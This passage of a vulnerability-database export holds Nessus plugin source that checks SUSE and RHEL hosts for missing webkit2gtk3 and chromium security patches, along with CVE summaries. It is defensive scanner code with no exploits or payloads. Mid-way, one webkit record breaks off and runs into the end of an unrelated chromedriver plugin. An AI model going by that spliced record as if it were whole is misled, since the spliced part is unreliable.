"SUSE_SU-2019-0497-1.NASL", "href": "https://www.tenable.com/plugins/nessus/122474", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:0497-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122474);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2018-4437\", 
\"CVE-2018-4438\", \"CVE-2018-4441\", \"CVE-2018-4442\", \"CVE-2018-4443\", \"CVE-2018-4464\", \"CVE-2019-6212\", \"CVE-2019-6215\", \"CVE-2019-6216\", \"CVE-2019-6217\", \"CVE-2019-6226\", \"CVE-2019-6227\", \"CVE-2019-6229\", \"CVE-2019-6233\", \"CVE-2019-6234\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : webkit2gtk3 (SUSE-SU-2019:0497-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for webkit2gtk3 to version 2.22.6 fixes the following\nissues (boo#1124937 boo#1119558) :\n\nSecurity vulnerabilities fixed :\n\nCVE-2018-4437: Processing maliciously crafted web content may lead to\narbitrary code execution. Multiple memory corruption issues were\naddressed with improved memory handling. (boo#1119553)\n\nCVE-2018-4438: Processing maliciously crafted web content may lead to\narbitrary code execution. A logic issue existed resulting in memory\ncorruption. This was addressed with improved state management.\n(boo#1119554)\n\nCVE-2018-4441: Processing maliciously crafted web content may lead to\narbitrary code execution. A memory corruption issue was addressed with\nimproved memory handling. (boo#1119555)\n\nCVE-2018-4442: Processing maliciously crafted web content may lead to\narbitrary code execution. A memory corruption issue was addressed with\nimproved memory handling. (boo#1119556)\n\nCVE-2018-4443: Processing maliciously crafted web content may lead to\narbitrary code execution. A memory corruption issue was addressed with\nimproved memory handling. (boo#1119557)\n\nCVE-2018-4464: Processing maliciously crafted web content may lead to\narbitrary code execution. Multiple memory corruption issues were\naddressed with improved memory handling. 
(boo#1119558)\n\nCVE-2019-6212: Processing maliciously crafted web content may lead to\narbitrary code execution. Multiple memory corruption issues were\naddressed with improved memory handling.\n\nCVE-2019-6215: Processing maliciously crafted web content may lead to\narbitrary code execution. A type confusion issue was addressed with\nimproved memory handling.\n\nCVE-2019-6216: Processing maliciously crafted web content may lead to\narbitrary code execution. Multiple memory corruption issues were\naddressed with improved memory handling.\n\nCVE-2019-6217: Processing maliciously crafted web content may lead to\narbitrary code execution. Multiple memory corruption issues were\naddressed with improved memory handling.\n\nCVE-2019-6226: Processing maliciously crafted web content may lead to\narbitrary code execution. Multiple memory corruption issues were\naddressed with improved memory handling.\n\nCVE-2019-6227: Processing maliciously crafted web content may lead to\narbitrary code execution. A memory corruption issue was addressed with\nimproved memory handling.\n\nCVE-2019-6229: Processing maliciously crafted web content may lead to\nuniversal cross-site scripting. A logic issue was addressed with\nimproved validation.\n\nCVE-2019-6233: Processing maliciously crafted web content may lead to\narbitrary code execution. A memory corruption issue was addressed with\nimproved memory handling.\n\nCVE-2019-6234: Processing maliciously crafted web content may lead to\narbitrary code execution. A memory corruption issue was addressed with\nimproved memory handling.\n\nOther bug fixes and changes: Make kinetic scrolling slow down smoothly\nwhen reaching the ends of pages, instead of abruptly, to better match\nthe GTK+ behaviour.\n\nFix Web inspector magnifier under Wayland.\n\nFix garbled rendering of some websites (e.g. 
YouTube) while scrolling\nunder X11.\n\nFix several crashes, race conditions, and rendering issues.\n\nFor a detailed list of changes, please refer to:\nhttps://webkitgtk.org/security/WSA-2019-0001.html\n\nhttps://webkitgtk.org/2019/02/09/webkitgtk2.22.6-released.html\n\nhttps://webkitgtk.org/security/WSA-2018-0009.html\n\nhttps://webkitgtk.org/2018/12/13/webkitgtk2.22.5-released.html\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119553\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119554\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119555\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119557\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119558\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/2018/12/13/webkitgtk2.22.5-released.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/2019/02/09/webkitgtk2.22.6-released.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2018-0009.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2019-0001.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4437/\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4438/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4441/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4442/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4443/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4464/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6212/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6215/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6216/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6217/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6226/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6227/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6229/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6233/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6234/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20190497-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?268ab889\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the 
command listed for your product :\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-2019-497=1\n\nSUSE Linux Enterprise Module for Desktop Applications 15:zypper in -t\npatch SUSE-SLE-Module-Desktop-Applications-15-2019-497=1\n\nSUSE Linux Enterprise Module for Basesystem 15:zypper in -t patch\nSUSE-SLE-Module-Basesystem-15-2019-497=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"typelib-1_0-WebKit2-4_0-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit-jsc-4-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit-jsc-4-debuginfo-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.6-3.18.2\")) 
flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk3-debugsource-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk3-devel-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"typelib-1_0-WebKit2-4_0-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit-jsc-4-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit-jsc-4-debuginfo-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk3-debugsource-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk3-devel-2.22.6-3.18.2\")) flag++;\n\n\nif (flag)\n{\n set_kb_item(name:'www/0/XSS', value:TRUE);\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkit2gtk3\");\n}\n", 
"cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:28:15", "description": "This update for webkit2gtk3 to version 2.22.6 fixes the following issues (boo#1124937 boo#1119558) :\n\nSecurity vulnerabilities fixed :\n\n - CVE-2018-4437: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. (boo#1119553)\n\n - CVE-2018-4438: Processing maliciously crafted web content may lead to arbitrary code execution. A logic issue existed resulting in memory corruption. This was addressed with improved state management. (boo#1119554)\n\n - CVE-2018-4441: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. (boo#1119555)\n\n - CVE-2018-4442: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. (boo#1119556)\n\n - CVE-2018-4443: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. (boo#1119557)\n\n - CVE-2018-4464: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. (boo#1119558)\n\n - CVE-2019-6212: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.\n\n - CVE-2019-6215: Processing maliciously crafted web content may lead to arbitrary code execution. A type confusion issue was addressed with improved memory handling.\n\n - CVE-2019-6216: Processing maliciously crafted web content may lead to arbitrary code execution. 
Multiple memory corruption issues were addressed with improved memory handling.\n\n - CVE-2019-6217: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.\n\n - CVE-2019-6226: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.\n\n - CVE-2019-6227: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling.\n\n - CVE-2019-6229: Processing maliciously crafted web content may lead to universal cross site scripting. A logic issue was addressed with improved validation.\n\n - CVE-2019-6233: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling.\n\n - CVE-2019-6234: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling.\n\nOther bug fixes and changes :\n\n - Make kinetic scrolling slow down smoothly when reaching the ends of pages, instead of abruptly, to better match the GTK+ behaviour.\n\n - Fix Web inspector magnifier under Wayland.\n\n - Fix garbled rendering of some websites (e.g. 
audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-09T18:53:25", "description": "An update for chromium-browser is now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 70.0.3538.67.\n\nSecurity Fix(es) :\n\n* chromium-browser: Sandbox escape in AppCache (CVE-2018-17462)\n\n* chromium-browser: Remote code execution in V8 (CVE-2018-17463)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-17464)\n\n* chromium-browser: Use after free in V8 (CVE-2018-17465)\n\n* chromium-browser: Memory corruption in Angle (CVE-2018-17466)\n\n* lcms2: Integer overflow in AllocateDataSet() in cmscgats.c leading to heap-based buffer overflow (CVE-2018-16435)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-17467)\n\n* chromium-browser: Cross-origin URL disclosure in Blink (CVE-2018-17468)\n\n* chromium-browser: Heap buffer overflow in PDFium (CVE-2018-17469)\n\n* chromium-browser: Memory corruption in GPU Internals (CVE-2018-17470)\n\n* chromium-browser: Security UI occlusion in full screen mode (CVE-2018-17471)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-17473)\n\n* chromium-browser: Use after free in Blink (CVE-2018-17474)\n\n* chromium-browser: Lack of limits on update() in ServiceWorker (CVE-2018-5179)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-17475)\n\n* chromium-browser: Security UI occlusion in full screen mode (CVE-2018-17476)\n\n* chromium-browser: UI spoof in Extensions 
(CVE-2018-17477)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2018-10-25T00:00:00", "type": "nessus", "title": "RHEL 6 : chromium-browser (RHSA-2018:3004)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-16435", "CVE-2018-17462", "CVE-2018-17463", "CVE-2018-17464", "CVE-2018-17465", "CVE-2018-17466", "CVE-2018-17467", "CVE-2018-17468", "CVE-2018-17469", "CVE-2018-17470", "CVE-2018-17471", "CVE-2018-17473", "CVE-2018-17474", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17477", "CVE-2018-5179"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:chromium-browser", "p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2018-3004.NASL", "href": "https://www.tenable.com/plugins/nessus/118373", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:3004. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(118373);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2018-5179\",\n \"CVE-2018-16435\",\n \"CVE-2018-17462\",\n \"CVE-2018-17463\",\n \"CVE-2018-17464\",\n \"CVE-2018-17465\",\n \"CVE-2018-17466\",\n \"CVE-2018-17467\",\n \"CVE-2018-17468\",\n \"CVE-2018-17469\",\n \"CVE-2018-17470\",\n \"CVE-2018-17471\",\n \"CVE-2018-17473\",\n \"CVE-2018-17474\",\n \"CVE-2018-17475\",\n \"CVE-2018-17476\",\n \"CVE-2018-17477\"\n );\n script_xref(name:\"RHSA\", value:\"2018:3004\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2018:3004)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for chromium-browser is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 70.0.3538.67.\n\nSecurity Fix(es) :\n\n* chromium-browser: Sandbox escape in AppCache (CVE-2018-17462)\n\n* chromium-browser: Remote code execution in V8 (CVE-2018-17463)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-17464)\n\n* chromium-browser: Use after free in V8 (CVE-2018-17465)\n\n* chromium-browser: Memory corruption in Angle (CVE-2018-17466)\n\n* lcms2: Integer overflow in AllocateDataSet() in cmscgats.c leading\nto heap-based buffer overflow (CVE-2018-16435)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-17467)\n\n* chromium-browser: Cross-origin URL disclosure in Blink\n(CVE-2018-17468)\n\n* chromium-browser: Heap buffer overflow in PDFium (CVE-2018-17469)\n\n* chromium-browser: Memory corruption in GPU Internals\n(CVE-2018-17470)\n\n* chromium-browser: Security UI occlusion in full screen mode\n(CVE-2018-17471)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-17473)\n\n* chromium-browser: Use after free in Blink (CVE-2018-17474)\n\n* chromium-browser: Lack of limits on update() in ServiceWorker\n(CVE-2018-5179)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-17475)\n\n* chromium-browser: Security UI occlusion in full screen mode\n(CVE-2018-17476)\n\n* chromium-browser: UI spoof in Extensions (CVE-2018-17477)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2018:3004\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-5179\");\n 
script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-16435\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17462\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17463\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17464\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17465\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17466\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17467\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17468\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17469\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17470\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17471\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17473\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17474\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17475\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17476\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17477\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium-browser and / or\nchromium-browser-debuginfo packages.\");\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-17474\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2018-17462\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 67, 68 and 69 Object.create exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/09/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. 
